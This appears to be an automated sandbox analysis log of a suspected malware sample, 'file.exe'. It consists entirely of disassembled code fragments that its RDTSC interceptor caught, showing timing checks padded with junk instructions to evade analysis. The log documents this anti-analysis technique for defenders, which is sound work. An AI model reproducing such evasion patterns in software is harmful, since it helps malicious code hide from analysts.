                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD84F5 second address: FD84FF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD84FF second address: FD8504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8504 second address: FD850C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD850C second address: FD8519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8519 second address: FD854A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC790h 0x00000007 jmp 00007F84086DC78Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 je 00007F84086DC79Ah 0x00000016 pushad 0x00000017 jnp 00007F84086DC786h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD880F second address: FD8813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8813 second address: FD8823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC78Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8823 second address: FD8835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8408CC9F8Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB8A4 second address: FDB8A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB9BC second address: FDB9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB9C0 second address: FDB9C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB9C4 second address: FDB9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB9CA second address: FDBA16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC797h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F84086DC799h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F84086DC794h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA49 second address: FDBA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA51 second address: FDBA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBA57 second address: FDBAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F8408CC9F8Bh 0x0000000e push 00000000h 0x00000010 movzx edi, di 0x00000013 call 00007F8408CC9F89h 0x00000018 jnl 00007F8408CC9F94h 0x0000001e push eax 0x0000001f push eax 0x00000020 pushad 0x00000021 jne 00007F8408CC9F86h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pop eax 0x0000002b mov eax, dword ptr [esp+04h] 0x0000002f jl 00007F8408CC9F90h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBAA7 second address: FDBB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F84086DC793h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 je 00007F84086DC792h 0x00000018 jg 00007F84086DC78Ch 0x0000001e pop eax 0x0000001f sub dword ptr [ebp+122D1F11h], edi 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 mov dx, 2991h 0x0000002d push 00000003h 0x0000002f mov dword ptr [ebp+122D1EECh], ebx 0x00000035 mov edx, dword ptr [ebp+122D27E7h] 0x0000003b push CF9C2B63h 0x00000040 pushad 0x00000041 jno 00007F84086DC78Ch 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBB0B second address: FDBB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBB11 second address: FDBB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 0F9C2B63h 0x0000000d mov si, FF5Bh 0x00000011 lea ebx, dword ptr [ebp+1244D7D6h] 0x00000017 mov esi, dword ptr [ebp+122D1B07h] 0x0000001d xchg eax, ebx 0x0000001e jng 00007F84086DC795h 0x00000024 push eax 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBB4A second address: FDBB4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBBCA second address: FDBBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBBD0 second address: FDBC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4CF8993Eh 0x00000010 movzx edx, bx 0x00000013 push 00000003h 0x00000015 sub dword ptr [ebp+122D1A4Fh], esi 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e movzx ecx, bx 0x00000021 pop edi 0x00000022 mov dword ptr [ebp+122D2F36h], eax 0x00000028 push 00000003h 0x0000002a mov esi, ebx 0x0000002c push F5924A59h 0x00000031 pushad 0x00000032 jng 00007F8408CC9F88h 0x00000038 push esi 0x00000039 pop esi 0x0000003a push esi 0x0000003b jmp 00007F8408CC9F95h 0x00000040 pop esi 0x00000041 popad 0x00000042 xor dword ptr [esp], 35924A59h 0x00000049 mov edi, dword ptr [ebp+122D307Dh] 0x0000004f lea ebx, dword ptr [ebp+1244D7E1h] 0x00000055 pushad 0x00000056 mov esi, 1FB96768h 0x0000005b mov si, FFA0h 0x0000005f popad 0x00000060 xchg eax, ebx 0x00000061 jo 00007F8408CC9F98h 0x00000067 push eax 0x00000068 push edx 0x00000069 jl 00007F8408CC9F86h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBC5F second address: FDBC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDBC63 second address: FDBC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEC825 second address: FEC82C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC6CD second address: FFC6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8408CC9F92h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA7E4 second address: FFA7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA967 second address: FFA985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F98h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFADA5 second address: FFADB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F84086DC786h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAF33 second address: FFAF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB498 second address: FFB49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB49E second address: FFB4AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F8408CC9F86h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4AC second address: FFB4BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC78Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4BA second address: FFB4C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F8Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4C8 second address: FFB4CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB4CC second address: FFB4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8BE3 second address: FC8C02 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push esi 0x0000000c pushad 0x0000000d jmp 00007F84086DC790h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB762 second address: FFB766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB766 second address: FFB77D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB77D second address: FFB782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFB782 second address: FFB7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Eh 0x00000009 jmp 00007F84086DC78Ah 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F84086DC78Dh 0x0000001a jnl 00007F84086DC78Eh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBD47 second address: FFBD4C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBEC4 second address: FFBEFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC795h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F84086DC792h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBEFD second address: FFBF18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F8408CC9F86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F8408CC9F8Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBF18 second address: FFBF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBF2A second address: FFBF40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8408CC9F86h 0x0000000a popad 0x0000000b push esi 0x0000000c jp 00007F8408CC9F86h 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFBF40 second address: FFBF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC236 second address: FFC242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC242 second address: FFC24C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC24C second address: FFC289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F8408CC9F86h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8408CC9F96h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC289 second address: FFC2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F84086DC799h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC2AF second address: FFC2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC567 second address: FFC58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b jng 00007F84086DC792h 0x00000011 popad 0x00000012 jc 00007F84086DC78Eh 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDAA5 second address: FFDACC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8408CC9F99h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDACC second address: FFDAE1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F84086DC78Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDAE1 second address: FFDAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408CC9F8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFDAF0 second address: FFDB09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC794h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC67 second address: FFFC89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8408CC9F8Ch 0x0000000c je 00007F8408CC9F86h 0x00000012 popad 0x00000013 push eax 0x00000014 jbe 00007F8408CC9F98h 0x0000001a push eax 0x0000001b push edx 0x0000001c jc 00007F8408CC9F86h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC89 second address: FFFC8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000185 second address: 1000189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000189 second address: 10001BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F84086DC794h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10002A8 second address: 10002AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10002AD second address: 10002B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF152 second address: FFF156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000395 second address: 1000399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10004B3 second address: 10004C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10004C4 second address: 10004C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCDC96 second address: FCDCA2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408CC9F8Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006AE7 second address: 1006AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006AEB second address: 1006B03 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007F8408CC9F86h 0x0000000d jnl 00007F8408CC9F86h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006B03 second address: 1006B16 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F84086DC786h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100723C second address: 1007242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100738F second address: 1007394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1009F66 second address: 1009F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8408CC9F86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A0E9 second address: 100A0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A2BC second address: 100A2C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F8408CC9F86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A9EC second address: 100A9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AC31 second address: 100AC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AE15 second address: 100AE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AF83 second address: 100AFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, edx 0x0000000a xchg eax, ebx 0x0000000b jmp 00007F8408CC9F8Ch 0x00000010 push eax 0x00000011 pushad 0x00000012 jbe 00007F8408CC9F8Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E455 second address: 100E45C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E1E4 second address: 100E1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E1E8 second address: 100E1ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EE57 second address: 100EE68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8408CC9F8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F850 second address: 100F85D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EC11 second address: 100EC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F85D second address: 100F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F861 second address: 100F8DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F8408CC9F8Ch 0x0000000f jg 00007F8408CC9F86h 0x00000015 popad 0x00000016 nop 0x00000017 mov esi, 4B6FB09Eh 0x0000001c push 00000000h 0x0000001e mov edi, esi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F8408CC9F88h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c adc si, F0D3h 0x00000041 xchg eax, ebx 0x00000042 jl 00007F8408CC9F95h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jnl 00007F8408CC9F92h 0x00000051 jmp 00007F8408CC9F8Ch 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F61D second address: 100F624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101033F second address: 1010343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
